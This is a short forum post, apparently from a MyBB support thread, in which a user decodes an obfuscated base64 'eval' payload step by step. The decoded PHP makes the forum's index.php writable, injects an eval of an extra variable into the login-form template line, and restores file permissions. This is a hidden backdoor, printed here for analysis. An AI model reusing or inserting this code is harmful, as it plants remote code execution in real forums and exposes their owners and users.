2011-10-03, 09:59 PM
(2011-10-03, 09:29 PM)Malcolm. Wrote: [ -> ]Erm, no you don't. Did you bother to decode it?Did I?
decode result:
@eval(base64_decode("JHRjbXA9QGZpbGVwZXJtcyhNWUJCX1JPT1QuJ2luZGV4LnBocCcpOyBAY2htb2QoTVlCQl9ST09ULidpbmRleC5waHAnLCAwNzc3KTsgJHRlbXA9QGZpbGVfZ2V0X2NvbnRlbnRzKE1ZQkJfUk9PVC4naW5kZXgucGhwJyk7ICR0YW1wPUBmb3BlbihNWUJCX1JPT1QuJ2luZGV4LnBocCcsICd3Jyk7IEBmd3JpdGUoJHRhbXAsIEBzdHJfcmVwbGFjZSgnZXZhbCgiXCRsb2dpbmZvcm0gPSBcIiIuJHRlbXBsYXRlcy0+Z2V0KCJpbmRleF9sb2dpbmZvcm0iKS4iXCI7Iik7JywgJ2V2YWwoIlwkbG9naW5mb3JtID0gXCIiLiR0ZW1wbGF0ZXMtPmdldCgiaW5kZXhfbG9naW5mb3JtIikuIlwiOyIuQCRjb2xbMjNdKTsnLCBAJHRlbXApKTsgQGZjbG9zZSgkdGFtcCk7IEBjaG1vZChNWUJCX1JPT1QuJ2luZGV4LnBocCcsIEAkdGNtcCk7IHJldHVybiB0cnVlOw=="))
and now decode again - result:
$tcmp=@fileperms(MYBB_ROOT.'index.php'); @chmod(MYBB_ROOT.'index.php', 0777); $temp=@file_get_contents(MYBB_ROOT.'index.php'); $tamp=@fopen(MYBB_ROOT.'index.php', 'w'); @fwrite($tamp, @str_replace('eval("\$loginform = \"".$templates->get("index_loginform")."\";");', 'eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);', @$temp)); @fclose($tamp); @chmod(MYBB_ROOT.'index.php', @$tcmp); return true;